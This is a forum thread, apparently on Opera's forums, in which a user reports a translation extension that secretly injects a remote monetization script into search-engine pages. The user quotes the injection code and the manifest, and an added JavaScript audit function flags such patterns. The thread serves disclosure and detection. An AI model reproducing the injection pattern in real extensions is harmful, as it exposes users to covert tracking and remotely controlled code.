    Report extension

    • leocg
      leocg Moderator Volunteer @Guest last edited by

      https://dev.opera.com/extensions/publishing-guidelines/#acceptance-criteria

      There you will find the criteria for an extension to be accepted. Of course stealing passwords is not allowed.

      And Opera is probably the browser that most takes users' security into consideration, making some of them even complain about the excess of security sometimes.

      • A Former User
        A Former User @leocg last edited by A Former User

        @leocg said in Report extension:

        And Opera is probably the browser that most takes users' security into consideration, making some of them even complain about the excess of security sometimes.

        If that is really the case, you should probably have an easy way to report extensions that don't behave, right? And from the impression you are giving me, it doesn't really sound like your statement is true, seeing that from the link you posted, at least 5 criteria were broken, and still you are treating me with disbelief 🤦‍♂️

        It must not collect private information without authorization from the user.

        The extension does not ask for consent in any way and still loads monetizus, which, as I said earlier, is a monetization service included on the extension. From the service webpage, here are some of those features, which track the user:

        • In-image: Monetize the most viewed and beloved content. Monetizus solution parses images by pixel to determine what’s in every image and drive relevant promotional materials to your audience.
        • Price Suggestor: [...] Fast and relevant search through the tons of products collects and drives the fairest results with the cheapest prices, depending on your user's activity.
        • Interstitial: [...] Monetize the time, users spend on the website with Monetizus.

        And, well, it is a monetization service, so there's probably more tracking under the hood...

        It must not change referral parameters, interfere with Opera monetization mechanisms or otherwise misappropriate traffic or revenues from other sources.

        It could misappropriate traffic or revenues from other sources using some of the features of the same service said above. All of the services provided by Monetizus go against this topic, and you can check them here. I'm not saying that the extension uses all of them, but the script that is loaded on the extension definitely has all those capabilities, and it is up to the Monetizus service to really decide if they will or not apply those services.

        No external JavaScript is allowed. All JavaScript code must be contained in the extension. External APIs are ok.

        As I said in the first post, the extension has the following code on the includes/user_js.js file:

        if (window.location.href.match(/[a-z]+:\/\/(www\.)?(bing|google|yandex|baidu|search\.yahoo|duckduckgo|qwant|nova\.rambler|youtube)\.[a-z]+(\/|$)/i))
        {
            console.log("demo mode: include monetizus plugin.");
            var monetizer_script = document.createElement("SCRIPT");
            monetizer_script.src = "//s3.amazonaws.com/cashe-js/1c31e14cd0e143b215.js";
            var firstScript = document.getElementsByTagName("SCRIPT")[0];
            firstScript.parentNode.insertBefore(monetizer_script, firstScript);
        }
        

        I don't know if you understand this code, but it is essentially inserting the script s3.amazonaws.com/cashe-js/1c31e14cd0e143b215.js. If the URL contains one of the following words, it injects the monetizus script: bing, google, yandex, baidu, search, yahoo, duckduckgo, qwant, nova, rambler, youtube. The code is delivered through an online address, so if monetizus decides to change the content of this script to do exactly what I said on the last post (secretly steal your passwords from facebook, google, etc), they could easily do it at any time, and you wouldn't even notice... I should probably state too that the URL s3.amazonaws.com/cashe-js/1c31e14cd0e143b215.js is reported by my antivirus (Kaspersky) as a dangerous URL.

        Ads in content scripts are not allowed.

        As I said, the monetizus script is loaded on the includes/user_js.js file, and as you can see on the manifest, it is included on the content_scripts section:

        "content_scripts": [ {
              "all_frames": true,
              "js": [ "includes/user_js.js" ],
              "matches": [ "*://*/*" ],
              "run_at": "document_end"
           } ],
        

        While linking to your own or other sites from your extension is fine, such links should be relevant and have a clear function. Don’t overload the extension with promotional links.

        A monetization/tracking service is definitely not relevant to the user of the extension, especially when being secretly bundled with a translating extension.

        So, again, can you please stop treating me with disbelief and offer some help? That is really annoying, as I'm trying to report a security issue to make Opera better, and those actions only discourage people from doing it...

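A static check for the two conditions described in the post above (a content script matched on every page that injects a script from a remote host), as an added example that is not part of the original post or of Opera's review process. The function name `auditExtension`, the rule labels and the regular expressions are assumptions of this example; the sample input reuses the manifest fragment and the snippet quoted in the post.

```javascript
// Added example: heuristic static check of an unpacked extension for
// remotely hosted script injection from broadly matched content scripts.
const BROAD_PATTERNS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);
// Matches document.createElement("script") in any letter case.
const CREATE_SCRIPT = /createElement\(\s*["']script["']\s*\)/i;
// Matches `.src = "<URL>"` where the URL is http(s) or protocol-relative.
const REMOTE_SRC = /\.src\s*=\s*["']((?:https?:)?\/\/([^\/"']+)[^"']*)["']/gi;

// manifest: parsed manifest.json; files: map of path -> source text.
function auditExtension(manifest, files) {
  const findings = [];
  for (const entry of manifest.content_scripts || []) {
    const broad = (entry.matches || []).filter((m) => BROAD_PATTERNS.has(m));
    for (const path of entry.js || []) {
      const source = files[path];
      if (source === undefined) continue; // file not supplied to the audit
      if (broad.length > 0) {
        findings.push({ rule: "BROAD_MATCH", path, detail: broad.join(", "),
                        allFrames: entry.all_frames === true });
      }
      if (!CREATE_SCRIPT.test(source)) continue;
      for (const m of source.matchAll(REMOTE_SRC)) {
        // A script element whose src is a literal remote URL: the code that
        // runs is controlled by whoever hosts that URL, not by the package.
        findings.push({ rule: "REMOTE_SCRIPT", path, detail: m[1], host: m[2] });
      }
    }
  }
  return findings;
}

// Sample input taken from the manifest fragment and snippet quoted in the post.
const sampleManifest = {
  content_scripts: [{ all_frames: true, js: ["includes/user_js.js"],
                      matches: ["*://*/*"], run_at: "document_end" }],
};
const sampleFiles = {
  "includes/user_js.js": `
    var monetizer_script = document.createElement("SCRIPT");
    monetizer_script.src = "//s3.amazonaws.com/cashe-js/1c31e14cd0e143b215.js";
    var firstScript = document.getElementsByTagName("SCRIPT")[0];
    firstScript.parentNode.insertBefore(monetizer_script, firstScript);`,
};

console.log(auditExtension(sampleManifest, sampleFiles));
```

The check is a pattern match on source text, so it misses URLs that are assembled at run time; a clean result is not proof that no remote code is loaded.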
        • leocg
          leocg Moderator Volunteer @Guest last edited by

          Maybe someday they will have a better system to report extensions. For now, I guess you can use this forum.

          • A Former User
            A Former User @leocg last edited by

            @leocg So, how can I proceed?

            • leocg
              leocg Moderator Volunteer @Guest last edited by

              I guess you already did what you can do by opening this topic.

              • A Former User
                A Former User @leocg last edited by

                @leocg Well, can't you do something about it? Or at least pass that to someone who can?

                • leocg
                  leocg Moderator Volunteer @Guest last edited by

                  I will see if I can do something.

                  • A Former User
                    A Former User @leocg last edited by

                    @leocg Thanks! Keep me updated, please!

                    • leocg
                      leocg Moderator Volunteer @leocg last edited by

                      The extension seems to be removed.

                      • A Former User
                        A Former User @leocg last edited by

                        @leocg Nice! Thanks!

                        I just wished this whole process could be less tiresome and time-consuming on my end you know, because I'm not the only one who should be looking for security issues like that, and with all the trouble I had to go through to just make a simple and obvious report, I think it just discourages people to do the same.

                        I don't know how and when Opera checks for issues on extensions that are submitted or updated, but I expected that at least the acceptance criteria would be thoroughly checked, which, as I see with that extension, was not the case at all. This issue gets amplified seeing the reach of that extension, which is on the top 10 recommended extensions and is the first one on the translation category. How does an extension like this get recommended by your team?

                        Along with that, an easier way to report an extension, which would not require me to dissect the extension source code and your acceptance criteria to look for issues would definitely be great...

                        • leocg
                          leocg Moderator Volunteer @Guest last edited by

                          Next time you can use https://security.opera.com/report-security-issue/

                          Choose web services and then addons.opera.com
